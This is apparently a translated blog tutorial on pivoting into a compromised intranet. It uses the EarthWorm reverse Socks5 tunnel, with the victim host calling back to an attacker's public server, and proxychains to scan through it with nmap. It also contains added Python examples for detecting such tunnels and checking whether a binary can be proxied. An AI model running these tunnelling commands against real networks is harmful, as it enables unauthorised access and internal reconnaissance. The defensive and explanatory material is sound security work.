0x00 Preface
Recently I needed to pivot into an intranet while setting up a server, and a friend recommended EW (EarthWorm) to me. This article simulates an attack scenario to give a brief introduction to using EarthWorm. The EW official site already describes all of this in great detail; this is purely a personal note covering the following points:
1. How to use EW as a reverse Socks5 proxy
2. How to set a Socks5 proxy in the browser to reach the target intranet's web service
3. Using proxychains to set a Socks5 proxy for the terminal (convenient for routing the traffic of local command-line tools into the target intranet)
0x01 Basic environment and network topology
Kali Linux (attacker, intranet 192.168.40.135)
Ubuntu 16.04.3 (attacker, public network http://120.xxxx.xxx.xxx)
Windows Server 2008 (victim, target intranet http://10.xxxx.xxx.xxx)
Network topology: Kali Linux is a local virtual machine, Ubuntu is an ECS instance on the public network, and Windows Server 2008 is the target machine on an internal IP with some of its ports mapped to the external network.
There should be a topology diagram here; I'll learn Visio later and add one, haha.
0x02 Scenario simulation
Suppose we have obtained access to a machine in the target intranet (the machine maps port 80 to the Internet, its web service has a vulnerability, and we have obtained a webshell). I need to go further into the intranet. At present I have a public-network Ubuntu host and an intranet Kali machine. How can I use a reverse Socks5 proxy to get Kali's traffic into the target intranet?
0x03 Using EW as a reverse Socks5 proxy
Here I only demonstrate using EW as a reverse Socks5 proxy. For the forward proxy and the multi-level cascading proxy, please refer to the official documentation.
Step 1: execute the following command on the public-network Ubuntu host:
./ew_for_linux64 -s rcsocks -l 1080 -e 1024 &
This command makes the public-network machine listen on ports 1080 and 1024: it waits for the attacker machine to connect to port 1080 and for the target machine to connect to port 1024.
Step 2: execute the following command on the target machine:
ew_for_Win.exe -s rssocks -d 120.xxx.xxx.xx -e 1024
where the value of the -d parameter is the public IP address of the public-network machine.
Step 3: the attacker machine accesses target intranet services through proxychains or by setting a Socks5 proxy in the browser.
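Seen from the target's side of the fence, the setup in Steps 1 to 3 has one observable: the compromised intranet host (rssocks) opens an outbound TCP session to a public address on a non-web port (1024 here) and keeps it up, re-establishing it if it drops. The following is an added detection example for this write-up, not code from the post or from the EarthWorm project; the record format, the subnets and every log line are constructed for the demo.

```python
"""Flag outbound connections that look like a reverse-tunnel callback.

Added example, not code from the post or from EarthWorm. The observable
for the rcsocks/rssocks setup is a server making a long-lived, or
repeatedly re-established, outbound TCP connection to an external address
on a port that is not normal web egress. Record format, subnets and log
lines below are constructed for the demo.
"""
from collections import defaultdict
from dataclasses import dataclass
from ipaddress import ip_address, ip_network

# Constructed connection records (as exported from a firewall or NetFlow):
# timestamp src_ip src_port dst_ip dst_port proto duration_s bytes_out bytes_in
SAMPLE_LOG = """\
2024-05-01T10:00:01 10.0.5.21 49152 203.0.113.10 1024 tcp 3600 51200 48000
2024-05-01T10:00:05 10.0.5.21 49160 203.0.113.10 443 tcp 2 1500 9000
2024-05-01T10:01:00 10.0.5.22 49200 198.51.100.7 80 tcp 1 800 12000
2024-05-01T10:02:00 10.0.5.23 49300 10.0.5.9 445 tcp 900 20000 30000
2024-05-01T10:03:00 10.0.5.21 49400 203.0.113.10 1024 tcp 40 2000 2000
"""

# RFC 1918 space; anything else counts as external. An explicit list is used
# instead of ipaddress.is_private, which also treats documentation ranges
# such as 203.0.113.0/24 (used in the sample) as private.
INTERNAL_NETS = [ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
SERVER_NETS = [ip_network("10.0.5.0/24")]  # constructed: where the web servers live


@dataclass(frozen=True)
class Flow:
    ts: str
    src: str
    sport: int
    dst: str
    dport: int
    proto: str
    duration: int
    bytes_out: int
    bytes_in: int


def parse_flows(text: str) -> list:
    """Parse the whitespace-separated records above into Flow objects."""
    flows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, sport, dst, dport, proto, dur, out, inc = line.split()
        flows.append(Flow(ts, src, int(sport), dst, int(dport), proto,
                          int(dur), int(out), int(inc)))
    return flows


def in_any(ip: str, nets) -> bool:
    addr = ip_address(ip)
    return any(addr in net for net in nets)


def flag_reverse_tunnels(flows, server_nets=SERVER_NETS, expected_ports=(80, 443),
                         min_duration=600, min_repeats=2):
    """Return {(src, dst, dport): [reasons]} for suspicious outbound TCP sessions.

    A session is a candidate when a server-subnet host connects outward to a
    non-RFC1918 address on a port outside expected web egress. It is flagged
    when such a session is long-lived, or when the same (src, dst, port)
    triple recurs, which is what a tunnel reconnecting after a drop looks like.
    """
    candidates = defaultdict(list)
    for f in flows:
        if f.proto != "tcp" or not in_any(f.src, server_nets):
            continue
        if in_any(f.dst, INTERNAL_NETS) or f.dport in expected_ports:
            continue
        candidates[(f.src, f.dst, f.dport)].append(f)

    findings = {}
    for key, group in candidates.items():
        reasons = []
        longest = max(f.duration for f in group)
        if longest >= min_duration:
            reasons.append(f"long-lived session ({longest}s)")
        if len(group) >= min_repeats:
            reasons.append(f"repeated callbacks ({len(group)})")
        if reasons:
            findings[key] = reasons
    return findings


if __name__ == "__main__":
    for (src, dst, dport), reasons in flag_reverse_tunnels(parse_flows(SAMPLE_LOG)).items():
        print(f"{src} -> {dst}:{dport}: {'; '.join(reasons)}")
```

Only the 10.0.5.21 to 203.0.113.10:1024 sessions are reported; the short 443 and 80 connections fall under normal egress and the 445 session stays inside RFC 1918 space. In practice the thresholds and the allowlist of expected egress ports are tuned per environment, and the same logic runs over real flow exports once the parser matches their format.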
0x04 Setting a Socks5 proxy in the browser
Point the browser's Socks5 proxy at port 1080 on the public-network machine and click OK. Now you can access the target intranet's web service through the browser.
0x05 Using proxychains to set a Socks5 proxy for the terminal
Step 1: download and install proxychains-ng
cd /usr/local/src
git clone https://github.com/rofl0r/proxychains-ng.git
cd proxychains-ng
./configure --prefix=/usr --sysconfdir=/etc
make && make install
make install-config
cd .. && rm -rf proxychains-ng
Step 2: edit the proxychains configuration file to set the proxy
vi /etc/proxychains.conf
socks5 120.xx.xx.xx 1080
Step 3: example: scan the target intranet with proxychains and nmap
After configuration, you can run something like proxychains nmap 192.168.40.133 to route nmap's traffic into the target intranet for scanning. Other command-line tools work the same way.
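One caveat worth knowing before relying on Step 3: proxychains-ng works by injecting a shared library through LD_PRELOAD that interposes libc's socket functions (connect(), and name resolution when proxy_dns is enabled). Anything that does not pass through those dynamically resolved libc calls is not proxied at all: statically linked binaries, programs that use raw sockets (nmap's default SYN scan and its ICMP host discovery), and UDP. This is the usual reason a tool appears to ignore the proxy, as the postscript observes. The following added example, not code from the post or from proxychains-ng, reads an ELF file's program headers and reports whether it carries a PT_INTERP entry, i.e. whether it is dynamically linked and therefore hookable in the first place (a necessary condition, not a sufficient one). The two ELF images it checks are constructed in the block and are not loadable programs.

```python
"""Tell whether an executable can be hooked by proxychains' LD_PRELOAD library.

Added example, not code from the post or from proxychains-ng. proxychains
only affects programs that resolve libc's socket functions dynamically, so
a statically linked binary (no PT_INTERP program header, hence no dynamic
loader) runs with its traffic untouched. The fake ELF images built here are
constructed for the demo and are not loadable programs.
"""
import struct

ELF_MAGIC = b"\x7fELF"
PT_LOAD = 1
PT_INTERP = 3  # program header naming the dynamic loader (e.g. ld-linux)


def elf_has_interp(data: bytes) -> bool:
    """Return True if the ELF image has a PT_INTERP header (dynamically linked)."""
    if data[:4] != ELF_MAGIC:
        raise ValueError("not an ELF file")
    ei_class, ei_data = data[4], data[5]  # 1/2 = 32/64-bit, 1/2 = little/big-endian
    end = "<" if ei_data == 1 else ">"
    if ei_class == 2:    # ELF64: e_phoff at 0x20, e_phentsize/e_phnum at 0x36
        (e_phoff,) = struct.unpack_from(end + "Q", data, 0x20)
        e_phentsize, e_phnum = struct.unpack_from(end + "HH", data, 0x36)
    elif ei_class == 1:  # ELF32: e_phoff at 0x1C, e_phentsize/e_phnum at 0x2A
        (e_phoff,) = struct.unpack_from(end + "I", data, 0x1C)
        e_phentsize, e_phnum = struct.unpack_from(end + "HH", data, 0x2A)
    else:
        raise ValueError("unknown EI_CLASS")
    # p_type is the first field of a program header in both ELF32 and ELF64
    for i in range(e_phnum):
        (p_type,) = struct.unpack_from(end + "I", data, e_phoff + i * e_phentsize)
        if p_type == PT_INTERP:
            return True
    return False


def proxychains_can_hook(path: str) -> bool:
    """Read an executable from disk and apply the check (e.g. to /usr/bin/nmap)."""
    with open(path, "rb") as fh:
        return elf_has_interp(fh.read())


def build_fake_elf64(phdr_types) -> bytes:
    """Constructed minimal little-endian ELF64 image with the given program
    header types: just enough header structure for elf_has_interp to parse."""
    e_ident = ELF_MAGIC + bytes([2, 1, 1, 0]) + b"\x00" * 8  # 64-bit, LE, version 1
    ehdr = e_ident + struct.pack(
        "<HHIQQQIHHHHHH",
        2, 62, 1,                 # e_type=EXEC, e_machine=x86-64, e_version
        0, 64, 0, 0,              # e_entry, e_phoff (right after the header), e_shoff, e_flags
        64, 56, len(phdr_types),  # e_ehsize, e_phentsize, e_phnum
        64, 0, 0)                 # e_shentsize, e_shnum, e_shstrndx
    phdrs = b"".join(struct.pack("<IIQQQQQQ", t, 0, 0, 0, 0, 0, 0, 0) for t in phdr_types)
    return ehdr + phdrs


DYNAMIC_SAMPLE = build_fake_elf64([PT_LOAD, PT_INTERP, PT_LOAD])  # constructed
STATIC_SAMPLE = build_fake_elf64([PT_LOAD, PT_LOAD])              # constructed

if __name__ == "__main__":
    print("dynamic sample hookable:", elf_has_interp(DYNAMIC_SAMPLE))  # True
    print("static sample hookable:", elf_has_interp(STATIC_SAMPLE))    # False
```

On a real system, proxychains_can_hook("/usr/bin/nmap") gives the same answer as checking for a dynamic loader with ldd or readelf -l; a False result means the tool's traffic will leave the host directly, regardless of what proxychains.conf says.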
0x06 Postscript
While using it I also ran into some problems: some tools do not use the Socks5 proxy, which is quite embarrassing, and the specific reason is unknown. I'm a little sleepy; I'll go home and sleep and solve the rest tomorrow. Health is the capital of revolution.
I hope students interested in this topic can get something out of this article. Of course, if there are any mistakes, please don't hesitate to point them out in the comments.
0x07 Reference links
Post-exploitation at a large domestic plant (ongoing series)
Using proxychains to apply a Socks5 proxy in the terminal (CSDN blog)
https://jingyan.baidu.com/album/b87fe19e9c0f9d5218356829.html?picindex=2
EarthWorm